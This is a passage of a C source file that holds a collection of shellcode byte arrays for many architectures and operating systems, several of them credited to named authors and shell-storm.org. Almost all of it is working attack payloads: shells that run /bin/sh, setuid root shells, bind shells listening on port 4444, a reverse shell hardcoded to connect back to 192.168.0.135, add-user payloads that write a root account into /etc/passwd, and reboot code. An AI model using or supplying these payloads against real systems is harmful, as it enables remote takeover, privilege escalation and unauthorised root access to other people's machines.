"\xcd\x2c\xd4\x54\xff\xe3\x4e\x75\x63\xc5\xff\x6e\xf5\x04\x1d\x1d\x1d\xe2\xcd\x48"
"\x4b\x79\xbc\x2d\x1d\x1d\x1d\x96\x5d\x11\x96\x6d\x01\xb0\x96\x75\x15\x94\xf5\x43"
"\x40\xde\x4e\x48\x4b\x4a\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1c\xf7\x96"
"\x57\x05\x96\x47\x3d\x1c\xf6\xfe\x28\x54\x96\x29\x96\x1c\xf3\x2c\xe2\xe1\x2c\xdd"
"\xb1\x25\xfd\x69\x1a\xdc\xd2\x10\x1c\xda\xf6\xef\x26\x61\x39\x09\x68\xfc\x96\x47"
"\x39\x1c\xf6\x7b\x96\x11\x56\x96\x47\x01\x1c\xf6\x96\x19\x96\x1c\xf5\xf4\x1f\x1d"
"\x1d\x1d\x2c\xdd\x94\xf7\x42\x43\x40\x46\xde\xf5\x32\xe2\xe2\xe2\x70\x75\x75\x33"
"\x78\x65\x78\x1d";
#if 0
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\
"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\
"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\
"\xff\x48\x65\x79\x4e";
#endif
unsigned char x86_w32_adduser[] =
"\x31\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x5e\x22\xde\x83\xeb\xfc\xe2\xf4\x14\xb6\x66\xde\xe8\x5e\xa9\x9b"
"\xd4\xd5\x5e\xdb\x90\x5f\xcd\x55\xa7\x46\xa9\x81\xc8\x5f\xc9\x97"
"\x63\x6a\xa9\xdf\x06\x6f\xe2\x47\x44\xda\xe2\xaa\xef\x9f\xe8\xd3"
"\xe9\x9c\xc9\x2a\xd3\x0a\x06\xda\x9d\xbb\xa9\x81\xcc\x5f\xc9\xb8"
"\x63\x52\x69\x55\xb7\x42\x23\x35\x63\x42\xa9\xdf\x03\xd7\x7e\xfa"
"\xec\x9d\x13\x1e\x8c\xd5\x62\xee\x6d\x9e\x5a\xd2\x63\x1e\x2e\x55"
"\x98\x42\x8f\x55\x80\x56\xc9\xd7\x63\xde\x92\xde\xe8\x5e\xa9\xb6"
"\xd4\x01\x13\x28\x88\x08\xab\x26\x6b\x9e\x59\x8e\x80\xae\xa8\xda"
"\xb7\x36\xba\x20\x62\x50\x75\x21\x0f\x3d\x4f\xba\xc6\x3b\x5a\xbb"
"\xc8\x71\x41\xfe\x86\x3b\x56\xfe\x9d\x2d\x47\xac\xc8\x27\x02\xa6"
"\xc8\x71\x63\x9a\xac\x7e\x04\xf8\xc8\x30\x47\xaa\xc8\x32\x4d\xbd"
"\x89\x32\x45\xac\x87\x2b\x52\xfe\xa9\x3a\x4f\xb7\x86\x37\x51\xaa"
"\x9a\x3f\x56\xb1\x9a\x2d\x02\xa7\xc8\x71\x63\x9a\xac\x5e\x22\xde";
/*
"\x33\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08"
"\x99\xc6\xb8\x83\xeb\xfc\xe2\xf4\xf4\x71\x82\xb8\x08\x99\x4d\xfd"
"\x34\x12\xba\xbd\x70\x98\x29\x33\x47\x81\x4d\xe7\x28\x98\x2d\xf1"
"\x83\xad\x4d\xb9\xe6\xa8\x06\x21\xa4\x1d\x06\xcc\x0f\x58\x0c\xb5"
"\x09\x5b\x2d\x4c\x33\xcd\xe2\xbc\x7d\x7c\x4d\xe7\x2c\x98\x2d\xde"
"\x83\x95\x8d\x33\x57\x85\xc7\x53\x83\x85\x4d\xb9\xe3\x10\x9a\x9c"
"\x0c\x5a\xf7\x78\x6c\x12\x86\x88\x8d\x59\xbe\xb4\x83\xd9\xca\x33"
"\x78\x85\x6b\x33\x60\x91\x2d\xb1\x83\x19\x76\xb8\x08\x99\x4d\xd0"
"\x34\xc6\xf7\x4e\x68\xcf\x4f\x40\x8b\x59\xbd\xe8\x60\x69\x4c\xbc"
"\x57\xf1\x5e\x46\x82\x97\x91\x47\xef\xfa\xab\xdc\x26\xfc\xbe\xdd"
"\x28\xb6\xa5\x98\x66\xfc\xb2\x98\x7d\xea\xa3\xca\x28\xe1\xe6\xc1"
"\x28\xb6\x87\xfc\x4c\xb9\xe0\x9e\x28\xf7\xa3\xcc\x28\xf5\xa9\xdb"
"\x69\xf5\xa1\xca\x67\xec\xb6\x98\x49\xfd\xab\xd1\x66\xf0\xb5\xcc"
"\x7a\xf8\xb2\xd7\x7a\xea\xe6\xc0\x28\xb6\x87\xfc\x4c\x99\xc6\xb8";
*/
unsigned char x86_w32_cmd_exit[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8"
"\x2a\x6e\x63\x83\xeb\xfc\xe2\xf4\x54\xc2\x2a\x63\xa8\x2a\xe5\x26"
"\x94\xa1\x12\x66\xd0\x2b\x81\xe8\xe7\x32\xe5\x3c\x88\x2b\x85\x2a"
"\x23\x1e\xe5\x62\x46\x1b\xae\xfa\x04\xae\xae\x17\xaf\xeb\xa4\x6e"
"\xa9\xe8\x85\x97\x93\x7e\x4a\x67\xdd\xcf\xe5\x3c\x8c\x2b\x85\x05"
"\x23\x26\x25\xe8\xf7\x36\x6f\x88\x23\x36\xe5\x62\x43\xa3\x32\x47"
"\xac\xe9\x5f\xa3\xcc\xa1\x2e\x53\x2d\xea\x16\x6f\x23\x6a\x62\xe8"
"\xd8\x36\xc3\xe8\xc0\x22\x85\x6a\x23\xaa\xde\x63\xa8\x2a\xe5\x0b"
"\x94\x75\x5f\x95\xc8\x7c\xe7\x9b\x2b\xea\x15\x33\xc0\xc5\xa0\x83"
"\xc8\x42\xf6\x9d\x22\x24\x39\x9c\x4f\x49\x03\x07\x86\x4f\x16\x06"
"\xa8\x2a\x6e\x63";
unsigned char sparc_linux_bind4444[] =
"\x23\x2d\x57\xbb\xa2\x14\x63\xd5\x20\xbf\xff\xff\x20\xbf\xff\xff"
"\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\xea\x23\xe0\x20"
"\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x9e\x03\xe0\x04"
"\x29\x75\x4f\xd2\xf1\x9a\xaf\xde\x61\x8a\x8f\xdf\x61\x89\x70\x2b"
"\xb1\xed\x30\x2b\xf1\xd1\xf0\x37\x60\x35\xaf\xcb\x06\x29\x8f\x1d"
"\x97\x99\xf0\xb1\x3c\x3a\x50\x91\x9a\x2d\xb0\xc1\x32\x6e\x0f\x15"
"\x54\x4a\xcf\x2d\xb1\xad\x30\x49\x69\xb8\x10\x0d\xc3\xdf\x12\xb8"
"\xfb\xe4\x2d\x22\x6c\x0b\x72\xa0\x1d\xfb\x52\xb4\xbf\xeb\xb2\xb5"
"\x22\x28\x0d\x4d\x32\x3f\x52\xa9\xa3\xef\xb2\xa1\x04\x2c\x0d\x39"
"\x44\x10\xcd\x45\xd4\x47\x12\xb0\x45\xb7\x72\xaa\xb6\x14\xcd\x3e"
"\xa4\x4b\x12\xbd\x5a\xc9\x32\xc0\xd9\x1d\x92\x98\x4c\xcd\xf3\x0c"
"\x7c\x52\x0c\xd1\x51\xae\x4c\xdd\xc5\xab\x73\x16\xc4\xc7\xab\xb2"
"\xa6\xcc\x6a\xac\x85\xe7\xb1\xea\x59\xdb\xea\x1a\xc8\x38\x4a\x12"
"\x0c\x04\x35\xd2\x1c\x58\xf5\xea\x5c\xbc\xb5\xf6\xde\xd2\xea\x3d"
"\x4f\x02\xca\x49\x70\xa3\x0a\x49";
unsigned char x86_bsd_suidsh[] =
"\x31\xc0\x50\x50\xb0\x17\xcd\x80" // setuid
"\x31\xc0\x50\x68"
"//sh\x68/bin"
"\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
unsigned char x86_netbsd_binsh[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
unsigned char x86_osx_binsh[] =
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";
unsigned char x86_osx_binsh2[] =
"\x99\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x54"
"\x54\x53\x53\x8d\x42\x3b\xcd\x80";
unsigned char x86_osx_bind4444[] =
"\x33\xc9\x83\xe9\xea\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
"\x7e\x85\xb4\x83\xeb\xfc\xe2\xf4\xaf\x3c\xdd\x79\x45\x14\xe4\xec"
"\x5c\x2c\xed\xa4\xc7\x6f\xd9\x3d\x24\x2c\xc7\xe6\x87\x2c\xef\xa4"
"\x08\xfe\x1c\x27\x94\x2d\xd7\xde\xad\x26\x48\x34\x75\x14\x48\x34"
"\x97\x2d\xd7\x04\xdb\xb3\x05\x23\xaf\x7c\xdc\xde\x9f\x26\xd4\xe3"
"\x94\xb3\x05\xfd\xca\xf7\x74\x4b\x3a\x81\xd5\xdc\xea\x51\xf6\xdc"
"\xad\x51\xe7\xdd\xab\xf7\x66\xe4\x91\x2a\xd6\xe7\x75\x45\x48\x34";
char x86_linux_binsh3[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
unsigned char x86_solaris_bind4444[] =
"\x31\xc9\x83\xe9\xe8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x08\x0b\x8d\x83\xeb\xfc\xe2\xf4\x87\xf7\xf3\x72\x03\xff\xdb\xdd"
"\x0e\xc8\xbb\x17\x6f\x81\xee\xbc\xf6\x59\x4a\xcc\x6e\x59\xbb\x6b"
"\xc0\xdd\x3a\x5f\xb6\xcf\x59\xeb\x57\x19\x57\xeb\x6e\x81\xed\xe7"
"\x2f\x5e\x5c\x3d\xd7\xf7\xde\x3d\xd6\xf7\xde\xdd\x6f\x5f\xbb\x67"
"\xc0\xdd\x3a\x5f\x8d\x01\x5a\xdf\x6f\xb8\x35\x72\xea\x41\x72\x7f"
"\x6f\x60\x24\xa2\x4c\x60\x63\xa2\x5d\x61\x65\x04\xdc\x58\x58\x04"
"\xdd\x58\x59\xde\x8f\x33\xf4\x58";
char arm_linux_thumb[] =
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0c\x30\xc0\x46\x01\x90"
"\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68";
char arm_linux_binsh[] =
"\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5"
"\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
"\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char arm_linux_suidsh[]=
"\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef"
"\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5" // shellcode
"\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
"\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char x86_openbsd_binsh[] =
"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x54"
"\x53\x53\x6a\x3b\x58\xcd\x80";
long x86_openbsd_bind6969[]= {
0x4151c931,0x51514151,0x61b0c031,0x078980cd,0x4f88c931,0x0547c604,0x084f8902,
0x0647c766,0x106a391b,0x5004478d,0x5050078b,0x68b0c031,0x016a80cd,0x5050078b,
0x6ab0c031,0xc93180cd,0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,0x50078b51,
0xb0c03150,0x4180cd5a,0x7503f983,0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,0x01b0c031,0xd8e880cd,0x2fffffff,
0x2f6e6962,0x90416873 };
unsigned char arm_linux_setuid[]=
"\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef";
unsigned long armle_osx_reverse[]= {
0xe3a00002, 0xe3a01001, 0xe3a02006, 0xe3a0c061, 0xef000080, 0xe1a0a000, 0xeb000001,
0x5c110200, //# port 4444
0x8700a8c0, //# host 192.168.0.135
0xe1a0000a, 0xe1a0100e, 0xe3a02010, 0xe3a0c062, 0xef000080,
0xe3a05002, 0xe3a0c05a, 0xe1a0000a, 0xe1a01005, 0xef000080,
0xe2455001, 0xe3550000, 0xaafffff8, 0xe3a00000, 0xe3a01001,
0xe3a0c07e, 0xef000080, 0xe0455005, 0xe1a0600d, 0xe24dd020,
0xe28f0014, 0xe4860000, 0xe5865004, 0xe1a01006, 0xe3a02000,
0xe3a0c03b, 0xef000080,
//# /bin/sh
0x6e69622f, 0x0068732f };
unsigned char x64_linux_binsh[] =
"\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53"
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b"
"\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05";
unsigned char x86_freebsd_reboot[] =
"\x31\xc0\x50\xb0\x37\xcd\x80";
unsigned char x86_freebsd_reverse[] =
"\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61"
"\xcd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e"
"\x53\x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53"
"\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d"
"\x7e\x0f\x31\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10"
"\x51\x53\x50\xb0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43"
"\x43\x7f\x00\x00\x01\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned char x86_bsdlinux_binsh[] = // by dymitrii
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50"
"\x8c\xe0\x21\xc0\x74\x04\xb0\x3b\xeb\x07\xb0\x0b\x99\x52\x53\x89\xe1\xcd\x80";
char x86_solaris_binsh[] =
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20"
"\x43"
"\xe0\xfa"
"\x93"
"\x29\xc0"
"\x89\x5e\x0b"
"\x29\xd2"
"\x88\x56\x19"
"\x89\x56\x07"
"\x89\x56\x0f"
"\x89\x56\x14"
"\xb0\x3b"
"\x8d\x4e\x0b"
"\x89\xca"
"\x52"
"\x51"
"\x53"
"\x50"
"\xeb\x18"
"\xe8\xc8\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48"
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04";
unsigned char x86_solaris_binshu[] =
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20\x43\xe0\xfa"
"\x93\x29\xc0\x89\x5e\x0b\x29\xd2\x88\x56\x19\x89\x56\x07\x89\x56\x0f\x89\x56\x14"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc8\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48" /* /bin/sh -= 0x20 */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
unsigned char ppc_osx_binsh0[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x71\x39\x40\x01\x71"
"\x39\x1f\xfe\xce\x7c\xa8\x29\xae\x38\x7f\xfe\xc7\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xca\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0a\xfe\x90"
"\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x54";
unsigned char ppc_osx_reboot[] =
"\x7c\x63\x1a\x79\x39\x40\x01\x70\x38\x0a\xfe\xb4\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x0a\xfe\xc7\x44\xff\xff\x02";
unsigned char ppc_osx_adduser[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70"
"\x39\x60\x01\x70\x39\x1f\xff\x0d\x7c\xa8\x29\xae\x38\x7f\xff\x04"
"\x38\x80\x02\x01\x38\xa0\xff\xff\x38\x0b\xfe\x95\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x9f\xff\x0e\x38\xab\xfe\xe5\x38\x0b\xfe\x94"
"\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0b\xfe\x96\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x38\x7f\xff\x04\x90\x61\xff\xf8"
"\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x0b\xfe\xcb\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x0b\xfe\x91\x44\xff\xff\x02\x2f\x74\x6d\x70"
"\x2f\x78\x2e\x73\x68\x58\x23\x21\x2f\x62\x69\x6e\x2f\x73\x68\x0a"
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x27\x72\x30\x30\x74\x3a"
"\x3a\x39\x39\x39\x3a\x38\x30\x3a\x3a\x30\x3a\x30\x3a\x72\x30\x30"
"\x74\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x27\x20\x7c\x20\x2f"
"\x75\x73\x72\x2f\x62\x69\x6e\x2f\x6e\x69\x6c\x6f\x61\x64\x20\x2d"
"\x6d\x20\x70\x61\x73\x73\x77\x64\x20\x2e\x0a";
long ppc_bsd_binsh[] = { /* Palante's BSD PPC shellcode w/ NULL*/
0x7cc63278, 0x2f867fff, 0x41bc005c, 0x7c6802a6,
0xb0c3fff9, 0xb0c3fff1, 0x38867ff0, 0x38a67ff4,
0x38e67ff3, 0x7ca52278, 0x7ce72278, 0x7c853a14,
0x7cc419ae, 0x7c8429d6, 0x7c842214, 0x7c043a14,
0x7ce72850, 0x7c852a14, 0x7c63212e, 0x7c832214,
0x7cc5212e, 0x7ca52a78, 0x44ffff02, 0x7ce03b78,
0x44ffff02, 0x4bffffa9, 0x2f62696e, 0x2f73685a,
0xffffffff, 0xffffffff
};
/*
* 203 byte StrongARM/Linux bind() portshell shellcode
* funkysh
*/
char arm_linux_bind[] =
"\x20\x60\x8f\xe2" /* add r6, pc, #32 */
"\x07\x70\x47\xe0" /* sub r7, r7, r7 */
"\x01\x70\xc6\xe5" /* strb r7, [r6, #1] */
"\x01\x30\x87\xe2" /* add r3, r7, #1 */
"\x13\x07\xa0\xe1" /* mov r0, r3, lsl r7 */
"\x01\x20\x83\xe2" /* add r2, r3, #1 */
"\x07\x40\xa0\xe1" /* mov r4, r7 */
"\x0e\xe0\x4e\xe0" /* sub lr, lr, lr */
"\x1c\x40\x2d\xe9" /* stmfd sp!, {r2-r4, lr} */
"\x0d\x10\xa0\xe1" /* mov r1, sp */
"\x66\xff\x90\xef" /* swi 0x90ff66 (socket) */
"\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
"\x35\x70\xc6\xe5" /* strb r7, [r6, #53] */
"\x14\x20\xa0\xe3" /* mov r2, #20 */
"\x82\x28\xa9\xe1" /* mov r2, r2, lsl #17 */
"\x02\x20\x82\xe2" /* add r2, r2, #2 */
"\x14\x40\x2d\xe9" /* stmfd sp!, {r2,r4, lr} */
"\x10\x30\xa0\xe3" /* mov r3, #16 */
"\x0d\x20\xa0\xe1" /* mov r2, sp */
"\x0d\x40\x2d\xe9" /* stmfd sp!, {r0, r2, r3, lr} */
"\x02\x20\xa0\xe3" /* mov r2, #2 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x0d\x10\xa0\xe1" /* mov r1, sp */
"\x66\xff\x90\xef" /* swi 0x90ff66 (bind) */
"\x45\x70\xc6\xe5" /* strb r7, [r6, #69] */
"\x02\x20\x82\xe2" /* add r2, r2, #2 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x66\xff\x90\xef" /* swi 0x90ff66 (listen) */
"\x5d\x70\xc6\xe5" /* strb r7, [r6, #93] */
"\x01\x20\x82\xe2" /* add r2, r2, #1 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x04\x70\x8d\xe5" /* str r7, [sp, #4] */
"\x08\x70\x8d\xe5" /* str r7, [sp, #8] */
"\x66\xff\x90\xef" /* swi 0x90ff66 (accept) */
"\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
"\x02\x10\xa0\xe3" /* mov r1, #2 */
"\x71\x70\xc6\xe5" /* strb r7, [r6, #113] */
"\x15\x07\xa0\xe1" /* mov r0, r5, lsl r7 <dup2> */
"\x3f\xff\x90\xef" /* swi 0x90ff3f (dup2) */
"\x01\x10\x51\xe2" /* subs r1, r1, #1 */
"\xfb\xff\xff\x5a" /* bpl <dup2> */
"\x99\x70\xc6\xe5" /* strb r7, [r6, #153] */
"\x14\x30\x8f\xe2" /* add r3, pc, #20 */
"\x04\x30\x8d\xe5" /* str r3, [sp, #4] */
"\x04\x10\x8d\xe2" /* add r1, sp, #4 */
"\x02\x20\x42\xe0" /* sub r2, r2, r2 */
"\x13\x02\xa0\xe1" /* mov r0, r3, lsl r2 */
"\x08\x20\x8d\xe5" /* str r2, [sp, #8] */
"\x0b\xff\x90\xef" /* swi 0x900ff0b (execve) */
"/bin/sh";
char x86_ppc_linux_binsh[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
// linux/ppc execve /bin/sh by Charles Stevenson (core) <core@bokeoa.com>
"\x7c\x3f\x0b\x78" /*mr r31,r1 # optional instruction */
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ" // the last byte becomes NULL
// lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
// Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
// Copyright(c) 2005 BaCkSpAcE <sinisa86@gmail.com>
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34";
char x86_ppc_osx_binsh[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"
// ppc execve() code by b-r00t
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58"
// osx86 execve() code by nemo
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff"
"/bin/shX";
/* by Jonathan Salwan
* http://shell-storm.org/shellcode/files/shellcode-735.php
*/
char arm_linux_adduser[] =
/* Thumb mode */
"\x05\x50\x45\xe0" /* sub r5, r5, r5 */
"\x01\x50\x8f\xe2" /* add r5, pc, #1 */
"\x15\xff\x2f\xe1" /* bx r5 */
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x78\x46" /* mov r0, pc */
"\x7c\x30" /* adds r0, #124 */
"\xff\x21" /* movs r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\x45\x31" /* adds r1, #69 */
"\xdc\x22" /* movs r2, #220 */
"\xc8\x32" /* adds r2, #200 */
"\x05\x27" /* movs r7, #5 */
"\x01\xdf" /* svc 1 */
/* r8 = fd */
"\x80\x46" /* mov r8, r0 */
/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x79\x46" /* mov r1, pc */
"\x18\x31" /* adds r1, #24 */
"\xc0\x46" /* nop (mov r8, r8) */
"\x48\x22" /* movs r2, #72 */
"\x04\x27" /* movs r7, #4 */
"\x01\xdf" /* svc 1 */
/* close(fd) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x06\x27" /* movs r7, #6 */
"\x01\xdf" /* svc 1 */
/* exit(0) */
"\x1a\x49" /* subs r1, r1, r1 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x01\x27" /* movs r7, #1 */
"\x01\xdf" /* svc 1 */
/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
"\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
"\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
"\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
"\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
"\x68\x0a"
/* /etc/passwd */
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
/* by Dustin Schultz
* http://shell-storm.org/shellcode/files/shellcode-736.php
*/
char x64_osx_suidsh[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";
